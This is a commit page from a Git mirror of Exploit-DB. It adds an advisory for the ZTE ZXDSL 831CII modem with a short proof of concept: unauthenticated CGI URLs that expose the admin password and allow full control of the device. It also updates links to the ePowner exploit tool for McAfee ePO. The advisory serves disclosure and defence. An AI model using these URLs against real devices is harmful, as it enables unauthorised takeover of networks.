bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

Updated 11_11_2014

Browse source
This commit is contained in:
Offensive Security 2014-11-11 04:46:30 +00:00
parent 173a7ded66
commit 21a8d11767
3 changed files with 36 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
files.csv
View file

@ -31698,3 +31698,4 @@ id,file,description,date,author,platform,type,port
35189,platforms/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local,0
35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0
35191,platforms/php/webapps/35191.txt,"CMS Tovar 'tovar.php' SQL Injection Vulnerability",2011-01-11,jos_ali_joe,php,webapps,0
35203,platforms/hardware/webapps/35203.txt,"ZTE ZXDSL 831CII - Insecure Direct Object Reference",2014-11-10,"Paulos Yibelo",hardware,webapps,0

Can't render this file because it is too large.

31
platforms/hardware/webapps/35203.txt Executable file
View file

@ -0,0 +1,31 @@
# Exploit Title: ZTE ZXDSL 831 Insecure Direct Object Reference
# Date: 11/3/2014
# Exploit Author: Paulos Yibelo
# Vendor Homepage: zte.com.cn
# Software Link: -
# Version: -
# Tested on: Windows 7
# CVE :-
ZTE ZXDSL 831CII suffers from an insecure direct object reference
vulnerability that allows for authentication bypass.
The modem usually serves html files & protects them with HTTP Basic
authentication. however, the cgi files, does not get this protection.
so simply requesting any cgi file (without no authentication) would
give a remote attacker full access to the modem and then can easily be
used to root the modem and disrupt network activities.
So requesting modem.ip.address would result HTTP Authentication
request, but simply requesting http://192.168.1.1/main.cgi will bypass
it.
PoC: http://192.168.1.1/adminpasswd.cgi (will result admin password
change page) - viewing the source will show the current password
(unencrypted)
http://192.168.1.1/userpasswd.cgi
http://192.168.1.1/upload.cgi
http://192.168.1.1/conprocess.cgi
http://192.168.1.1/connect.cgi
.
.

6
platforms/windows/remote/33071.txt
View file

@ -5,9 +5,11 @@
# Version: 4.6.0 -> 4.6.5
# Tested on: Windows 2003/2008
# CVE : CVE-2013-0140 , CVE-2013-0141
# More info on: http://funoverip.net/?p=1685
# More info on: http://funoverip.net/?p=1685 & https://github.com/funoverip/epowner
PoC: http://www.exploit-db.com/sploits/ePowner.0.1.tar.gz
PoC:
v0.1 - http://www.exploit-db.com/sploits/ePowner.0.1.tar.gz
v0.2.1- http://www.exploit-db.com/sploits/epowner-0.2.1.zip
=====================================================================================================
INTRODUCTION